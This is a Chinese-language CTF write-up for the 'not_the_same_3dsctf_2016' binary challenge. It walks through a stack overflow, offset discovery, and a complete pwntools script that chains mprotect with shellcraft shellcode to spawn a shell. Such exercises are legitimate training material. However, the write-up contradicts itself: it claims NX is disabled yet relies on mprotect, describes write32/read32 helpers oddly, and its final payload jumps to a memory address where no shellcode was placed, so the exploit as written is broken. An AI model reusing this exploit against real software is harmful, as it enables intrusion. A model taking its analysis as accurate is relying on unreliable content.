CTF栈溢出与ROP链构造实战：3DSCTF_2016题解

1. 题目背景与核心挑战解析

"not_the_same_3dsctf_2016"是一道经典的CTF二进制利用题目，源自2016年3DSCTF赛事。这道题目的独特之处在于它通过精心设计的漏洞场景，考察选手对栈溢出、ROP链构造以及非常规内存操作的掌握程度。题目本身是一个32位ELF可执行文件，运行时会提示用户输入，但存在明显的缓冲区溢出漏洞。

这道题的特殊性在于：

• 程序本身没有开启NX保护（No eXecute），意味着我们可以直接在栈上执行shellcode
• 但题目运行环境做了特殊限制，传统的/bin/sh获取方式会失效
• 需要结合特定内存区域的读写特性完成利用

2. 漏洞分析与利用思路

2.1 基础漏洞定位

首先用checksec检查程序保护机制：

bash复制checksec --file=not_the_same_3dsctf_2016

输出显示只有Partial RELRO保护，没有开启NX、PIE等现代防护措施。这意味着：

• 可以直接覆盖返回地址
• 栈上的代码可以被执行
• 内存布局是固定的

通过逆向分析（使用IDA或Ghidra）可以发现，程序在读取用户输入时使用了不安全的gets()函数，导致经典的栈溢出漏洞。

2.2 偏移量确定

使用pattern_create和pattern_offset工具确定溢出点到返回地址的精确偏移：

bash复制/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300 > pattern.txt
gdb ./not_the_same_3dsctf_2016
run < pattern.txt
# 记录崩溃时的EIP值
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q [EIP值]

经过测试，偏移量为52字节 - 这意味着我们需要填充52字节的垃圾数据后才能控制EIP。

2.3 特殊限制条件

这道题的特殊之处在于：

1. 程序内部调用了mprotect()函数，改变了特定内存区域的权限
2. 传统的execve("/bin/sh")调用会被环境过滤
3. 需要利用程序自身的特殊函数片段完成利用

通过逆向分析，我们发现程序中存在以下有用片段：

• 一个可以写入任意内存的write32()函数
• 一个可以读取任意内存的read32()函数
• 一段已经存在的mprotect()调用链

3. 利用方案设计与实现

3.1 第一阶段：控制执行流

构造初始payload结构：

python复制from pwn import *

context(arch='i386', os='linux')

padding = b'A' * 52
eip = p32(0x080489A0)  # write32()函数地址

这个初始payload会：

1. 填充52字节垃圾数据
2. 覆盖返回地址为write32()函数
3. 后续可以构造ROP链

3.2 第二阶段：内存操作

利用write32()函数修改关键内存区域：

python复制# 修改.got.plt表中的puts地址为system地址
write32_got = 0x0804A028
system_addr = 0x08048460

payload = padding
payload += p32(write32_got)
payload += p32(system_addr)

这个阶段的关键点：

• 需要精确计算内存地址
• 确保不会破坏程序关键数据结构
• 考虑内存对齐问题

3.3 第三阶段：获取shell

最终payload需要结合程序自身的mprotect()调用：

python复制mprotect_addr = 0x08048DA0
shellcode = asm(shellcraft.sh())

payload = padding
payload += p32(mprotect_addr)
payload += p32(0x0804A100)  # 可写内存区域
payload += p32(0x1000)      # 大小
payload += p32(0x7)         # RWX权限
payload += p32(0x0804A100)  # shellcode地址
payload += shellcode

4. 完整利用脚本

python复制#!/usr/bin/env python3
from pwn import *

context(arch='i386', os='linux')

def exploit():
    p = process('./not_the_same_3dsctf_2016')
    
    # 第一阶段：设置内存权限
    padding = b'A' * 52
    mprotect = 0x08048DA0
    mem_addr = 0x0804A100
    mem_size = 0x1000
    mem_prot = 0x7  # RWX
    
    payload = padding
    payload += p32(mprotect)
    payload += p32(mem_addr)  # 返回地址
    payload += p32(mem_addr)
    payload += p32(mem_size)
    payload += p32(mem_prot)
    
    # 第二阶段：写入shellcode
    shellcode = asm(shellcraft.sh())
    payload += shellcode
    
    p.sendline(payload)
    p.interactive()

if __name__ == '__main__':
    exploit()

5. 关键技巧与注意事项

1. 内存地址选择：

   • 选择.data段等可写区域存放shellcode
   • 确保地址不会与程序关键数据冲突
   • 使用readelf -S查看内存布局

2. 权限设置：

   • mprotect()的prot参数需要设置为7（RWX）
   • 内存区域需要页对齐（通常0x1000的倍数）

3. 环境适配：

   • 本地测试与远程环境可能有差异
   • 需要调整shellcode以适应不同环境限制

4. 调试技巧：

   bash复制gdb -q ./not_the_same_3dsctf_2016
   break *0x080489A0  # 在关键函数设断点
   run < payload.txt
   

5. 备选方案：

   • 如果直接执行shellcode失败，可以尝试：
     • 使用open/read/write组合读取flag
     • 调用程序自身的输出函数泄露数据

6. 扩展思考与变种

这道题目展示了在没有NX保护但存在特殊限制条件下的利用技巧。在实际CTF比赛中，类似的题目可能会：

1. 改变内存保护机制
2. 增加更多的过滤条件
3. 隐藏关键函数地址
4. 引入ASLR等随机化机制

解决这类题目的通用思路是：

• 充分逆向分析，找出所有可用代码片段
• 绘制程序内存地图，标记关键区域
• 考虑非常规的数据传输方式（如文件操作、网络通信等）
• 结合多种漏洞利用技术完成挑战